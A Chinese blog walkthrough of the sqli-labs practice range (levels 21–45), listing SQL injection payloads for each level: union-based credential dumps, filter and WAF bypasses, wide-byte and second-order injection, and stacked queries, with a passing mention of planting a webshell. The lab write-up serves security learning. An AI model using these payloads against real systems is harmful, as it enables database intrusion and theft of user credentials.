sqli-labs靶场通关技巧(21-45)

最新推荐文章于 2024-08-14 21:05:20 发布
最新推荐文章于 2024-08-14 21:05:20 发布
阅读量523 收藏 2
点赞数 1
分类专栏: sql注入 文章标签: mysql 信息安全 安全漏洞 黑盒测试 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ldzhhh/article/details/107760688
版权

Less21

基于’)的cookie报头注入

这里在cookie处加密了字符串,将我们的payload经过base64加密即可绕过

暴库payload:-admin') union select 1,2,database()#

爆表payload:-admin') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'#

爆字段payload:-admin') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'#

爆值payload:-admin') union select 1,2,group_concat(username,'-',password) from security.users#

 

 

Less22

基于”的cookie报头注入

暴库payload:-admin" union select 1,2,database()#

爆表payload:-admin" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'#

爆字段payload:-admin" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'#

爆值payload:-admin" union select 1,2,group_concat(username,'-',password) from security.users#

 

 

Less23

基于’的字符型注入(过滤注释符)

暴库payload:id=-1' union select 1,2,database()'

爆表payload:id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' '

爆字段payload:id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' '

爆值payload:id=' union select 1,2,group_concat(username,'~',password) from users  where 1 or '1' = '

 

 

Less24

二次注入

假设我们在知道账号为admin,但不知道密码的情况下,点击注册一个新用户

注册一个账号为admin’#密码为123456的账号

登录账号admin’#,并修改admin的密码为123456

然后就可以用账号admin,密码123456登录了。

原理:

登录admin'#账号修改密码时, 此时的Sql语句为UPDATE users SET passwd="New_Pass" WHERE username =' admin' # ' AND password=',也就是执行了UPDATE users SET passwd="New_Pass" WHERE username =' admin'。

 

 

Less25

基于’的字符型注入(过滤or和and)

注意:因为or字符被过滤了,所以infoorrmation、passwoorrd的or应该双写绕过。

暴库payload:id=-1' union select 1,2,database()--+

爆表payload:id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+

爆字段payload:id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users'--+

爆值payload:id=-1' union select 1,2,group_concat(username,'~',passwoorrd) from security.users  --+

 

 

Less25a

整数型注入(过滤or和and)

这关和上一关基本一样,不同之处在于这关是整数型注入

暴库payload:id=-1 union select 1,2,database()--+

爆表payload:id=-1 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+

爆字段payload:id=-1 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users'--+

爆值payload:id=-1 union select 1,2,group_concat(username,'~',passwoorrd) from security.users  --+

 

 

Less26

基于’的字符型注入(过滤空格、注释、or和and)

因为空格被过滤了,可以用%a0代替空格;注释符被过滤了,可以构造闭合绕过。

暴库payload:id=0'%a0union%a0select%a01,database(),'3

爆表payload:id=0'%a0union%a0select%a01,2,group_concat(table_name)%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema='security'%a0'

爆字段payload:id=0'%a0union%a0select%a01,2,group_concat(column_name)%a0from%a0infoorrmation_schema.columns%a0where%a0table_name='users'%a0'

爆值payload:id=0'%a0union%a0select%a01,2,group_concat(username,passwoorrd)%a0from%a0security.users%a0where%a01%a0oorr%a0'1' = '

 

 

Less26a

基于’)的字符型注入(过滤空格、注释、or和and)

因为空格被过滤了,可以用%a0或者%0b代替空格;注释符被过滤了,可以构造闭合绕过。

暴库payload:id=0')%0bunion%0bselect%0b1,database(),3%0b||('1')=('1

爆表payload:id=0')%0bunion%0bselect%0b1,2,group_concat(table_name)%0bfrom%0binfoorrmation_schema.tables%0bwhere%0btable_schema='security'anandd('1')=('1

爆字段payload:id=0')%0bunion%0bselect%0b1,2,group_concat(column_name)%0bfrom%0binfoorrmation_schema.columns%0bwhere%0btable_name='users'anandd('1')=('1

爆值payload:id=0')%a0union%a0select%a01,2,group_concat(username,passwoorrd)%a0from%a0security.users%a0where%a01%a0oorr%a0('1') =( '

可以代替空格的字符:

%09TAB键(水平)
%0a新建一行
%0c新的一页
%0dreturn功能
%0bTAB键(垂直)
%a0空格

 

Less27

基于’的字符型注入(过滤空格、注释符、union和select)

大小写绕过关键字的过滤

暴库payload:id=0'%a0uniOn%a0sElEct%a01,database(),3%a0or%a0'1'='1

爆表payload:id=0'%a0uniOn%a0sElEct%a01,(group_concat(table_name)),3%a0from%a0information_schema.tables%a0where%a0table_schema='security'%a0%26%26%a0'1'='1

爆字段payload:id=0'%a0uniOn%a0sElEct%a01,(group_concat(column_name)),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0%26%26%a0'1'='1

爆值payload:id=0'%a0uniOn%a0sElEct%a01,(group_concat(username,password)),3%a0from%a0security.users%a0uniOn%a0seLect%a01,2,'3

 

 

Less27a

基于”的字符型注入(过滤空格、注释符、union和select)

大小写绕过关键字的过滤

暴库payload:id=0"%a0uniOn%a0sElEct%a01,database(),3%a0or%a0"1"="1

爆表payload:id=0"%a0uniOn%a0sElEct%a01,(group_concat(table_name)),3%a0from%a0information_schema.tables%a0where%a0table_schema='security'%a0%26%26%a0"1"="1

爆字段payload:id=0"%a0uniOn%a0sElEct%a01,(group_concat(column_name)),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0%26%26%a0"1"="1

爆值payload:id=0"%a0uniOn%a0sElEct%a01,(group_concat(username,password)),3%a0from%a0security.users%a0uniOn%a0seLect%a01,2,"3

 

 

Less28

基于’)的字符型注入(过滤空格、注释符、union和select)

暴库payload:id=0')UNion%a0SElect%a01,database(),('1')=('1

爆表payload:id=0')UNion%a0SElect%a01,(group_concat(table_name)),3%a0from%a0information_schema.tables%a0where%a0table_schema='security'%a0%26%26%a0('1')=('1

爆字段payload:id=0')UNion%a0SElect%a01,(group_concat(column_name)),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0%26%26%a0('1')=('1

爆值payload:id=0')UNion%a0SElect%a01,(group_concat(username,password)),3%a0from%a0security.users%a0where%a0('1')=('1

 

 

Less28a

和less28一样,用相同的payload即可注入

 

搭建waf环境

因为less29-less32是绕waf,所以这里得先搭建好waf环境,我这里直接在Windows下面搭建了。

下载jspstudy: https://www.xp.cn/download.html

安装路径不要包含中文就行了。

为了不与之前安装好的phpstudy端口冲突,这里须更改站点端口为8080.

 

将sqli-labs-master中的tomcat-files压缩包解压到下面路径中。

打开下面路径中的index.jsp文件

将下面路径修改为php服务下的相对应关卡路径。

带上2个参数即可访问即可

 

服务器两层架构相关讲解:https://www.cnblogs.com/lcamry/p/5762961.html

 

Less29

基于’的字符型注入(waf保护)

这里的参数由于受waf保护,无法注入

利用参数污染注入,传入2个参数,第一个用来欺骗waf,第二个用于正常访问。

暴库payload:?id=1&id=-1' union select 1,2,database()--+

爆表payload:?id=1&id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆字段payload:?id=1&id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

爆值payload:?id=1&id=-1' union select 1,2,group_concat(username,'-',password) from security.users--+

 

Less30

基于”的字符型注入(waf保护)

暴库payload:?id=1&id=-1" union select 1,2,database()--+

爆表payload:?id=1&id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆字段payload:?id=1&id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

爆值payload:?id=1&id=-1" union select 1,2,group_concat(username,'-',password) from security.users--+

 

 

Less31

基于”)的字符型注入(waf保护)

暴库payload:?id=1&id=-1") union select 1,2,database()--+

爆表payload:?id=1&id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆字段payload:?id=1&id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

爆值payload:?id=1&id=-1") union select 1,2,group_concat(username,'-',password) from security.users--+

 

 

Less32

宽字节注入

因为单引号被转义了,'security'、'users'这两个地方的单引号自然也会被转义,这里可以将security、users进行十六进制编码。

暴库payload:id=-1%df' union select 1,2,database()--+

爆表payload:id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+

爆字段payload:id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+

爆值payload:id=-1%df' union select 1,2,group_concat(username,password) from security.users--+

 

Less33

和less32一样,用相同的payload即可注入

 

Less34

宽字节Post注入

利用burpsuite抓包、在uname处插入payload

暴库payload:a%df' union select 1,database()#

爆表payload:a%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479#

爆字段payload:a%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#

爆值payload:a%df' union select 1,group_concat(username,password) from security.users#

 

 

Less35

数字型注入

这里的单引号还是被转义了,'security'、'users'这两个地方还是要进行十六进制编码。

暴库payload:id=-1 union select 1,2,database()--+

爆表payload:id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+

爆字段payload:id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+

爆值payload:id=-1 union select 1,2,group_concat(username,password) from security.users--+

 

Less36

还是宽字节注入,用less32的payload即可注入

 

Less37

宽字节Post注入,注入方法以及payload和less32一样

 

Less38

堆叠注入

利用堆叠注入创建一个表

Payload:?id=1';create table duidie like users;--+

创建成功,说明能利用堆叠注入。此外可以利用堆叠注入写入一句话木马,然后用菜刀连接。

堆叠注入讲解:https://www.cnblogs.com/lcamry/p/5762905.html

 

Less39

数字型堆叠注入,和less38的区别就是少个单引号。

Payload:?id=1;create table duidie1 like users;--+

 

Less40

基于’)的字符型堆叠注入,和less38的区别就是少个单引号。

Payload:?id=1'); create table duidie2 like users;--+

 

Less41

和less39一样,只是少了错误回显信息,执行payload还是一样的。

 

Less42

还是堆叠注入,在密码输入框中注入。

Payload:a';create table duidie like users;# 

 

Less43

基于’)的字符型堆叠注入,和less42的区别就是多了个括号。

Payload:a'); create table duidie like users;# 

 

Less44

和less42一样,只是少了回显信息,执行payload还是一样的。

 

Less45

和less43一样,只是少了回显信息,执行payload还是一样的。

 

小结

Less21-22            cookie报头注入

Less24                  二次注入

Less23、25-28a  关键字符被过滤,结合大小写绕过、双写绕过、字符替换、构造闭合、编码等方式注入。

Less29-31            waf保护,参数污染注入

Less32-37            宽字节注入

Less38-45            堆叠注入

 

参考链接

https://blog.csdn.net/weixin_45728976/article/details/103932264

https://blog.csdn.net/harrywade/article/details/81842491

见痴
关注
专栏目录
sqli-labs靶场(1-22
weixin_51566481的博客
08-16 7778
sqli-labs,sql注入,burpsuit
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2024
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-lab靶场通关
qq_55202378的博客
10-09 486
sqli-lab SQL注入
sqli-labs靶场通关攻略
最新发布
test_zpx的博客
08-14 820
Good Good Study,Day Day Up!
SQL注入:sqli-labs靶场通关(1-37
qq_68163788的博客
02-03 9649
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
sqli-labs靶场笔记
qq_33441500的博客
10-20 240
less-1 单引号的显错注入 键代码段 直接输入单引号让其报错 由代码我们可以看出数据库查询语句只是对id传参进行了...
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1551
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 821
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场21、22详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1147
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
Sqli-labs靶场第18详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1332
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 7139
SQL注入从入门到进阶:sqli-labs全通关笔记 Less-1~Less64
Sqli-labs 靶场通关学习记录
eyyer的博客
02-13 1408
Sqli-labs 靶场通关学习记录
sqli-labs靶场1-12通关记录
SEV__en的博客
07-25 1754
攻击者通过注入SQL语句片段导致后端执行预期外的SQL查询。
sqli-labs靶场通关(1-10)
Fly_Mojito的博客
06-11 3864
sqli-labs靶场通关(1-10)
sqli-labs 靶场通关(1-10)
知世郎
10-15 2177
第七当在输入id=1,页面显示you are in... 当我们输入id=1'时显示报错,但是没有报错信息,这和我们之前的卡不一样,之前都有报错信息。然后我输入id=1'--+时报错,这时候我们可以输入id=1')--+发现依然报错,之时我试试是不是双括号输入id=1'))--+,发现页面显示正常。id=1' and ascii(substr(database(),1,1))=115 -- qwe //正常 库名首字母ascii码115所对应的字母是s。id=2'的时候看到页面报错信息。
sqli-abs靶场通关记录(持续更新中)
宝儿姐的博客
08-11 1312
id=1’ and 1=1–+/#和?id=1’ and 1=2–+/#进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为字符型注入。id=1 and 1=1 和?id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为数字型注入。id=1’order by 3 --+,这里的数字是从小往大了试的,知道出现错误时,那么列数就是前面那一个正常值。1.1判断是否存在sql注入。.
sqli-labs靶场通关攻略(一到十
2301_81881972的博客
08-14 1069
判断数据库第一位字符的ascii码是否大于115 页面正常显示不延迟3秒说明不大于, 大于114不大于115 说明第一位字符ascii码等于115。判断数据库第一位字符的ascii码是否大于115 页面正常显示不延迟3秒说明不大于, 大于114不大于115 说明第一位字符ascii码等于115。用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114。
sqli-labs靶场通关秘籍分享(1-10
weixin_45585955的博客
04-16 2787
一、 1、SQL注入原理:sql语句未经查询直接带入数据库查新,sql注入攻击其实就是服务端的攻击,它与操作系统、服务器类型、脚本语言无 2、sql注入类型:分为数字型、字符型、搜索型、xx型 3、注入提交方式:get提交、post提交、cookie提交。 4、注入攻击提交支持的类型 union注入、information_schema、宽字节注入、报错注入、盲注,这里的盲注分为三种,分别是 布尔型盲注、时间型盲注、报错型盲注。 updatexml注入分为 insert注入、update注入
sqli-labs靶场通关
08-25
对于sqli-labs靶场通关,你需要具备一定的SQL注入的知识和技巧。以下是一些通关的步骤和提示: 1. 确保你已经安装了LAMP/WAMP/MAMP服务器环境,并将sqli-labs源码解压到Web服务器的根目录下。 2. 打开浏览器,访问sqli-labs的首页,通常是 http://localhost/sqli-labs/。 3. 在首页上,你会看到一系列的级别和挑战。从级别1开始,逐步挑战更高级别的注入漏洞。 4. 阅读每个级别的说明和提示,理解目标和漏洞类型。 5. 使用SQL注入的技巧来寻找漏洞并进行利用。一些常见的注入技巧包括:使用单引号、双引号绕过输入过滤、使用UNION SELECT语句、使用注释符绕过过滤、使用布尔盲注等。 6. 尝试不同的Payload(载荷)来获取敏感信息或执行恶意操作。例如,获取数据库的表名、列名、数据内容,或者尝试修改数据库中的数据。 7. 当你成功获取到键信息或者完成了特定的目标,即可认为通关。 需要注意的是,在进行sqli-labs靶场挑战时,请确保你在合法的环境中进行,不要尝试攻击他人的系统或进行非法活动。同时,及时备份并恢复你的环境,以防误操作导致数据丢失。 希望这些步骤和提示对你有所帮助!如有更多问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值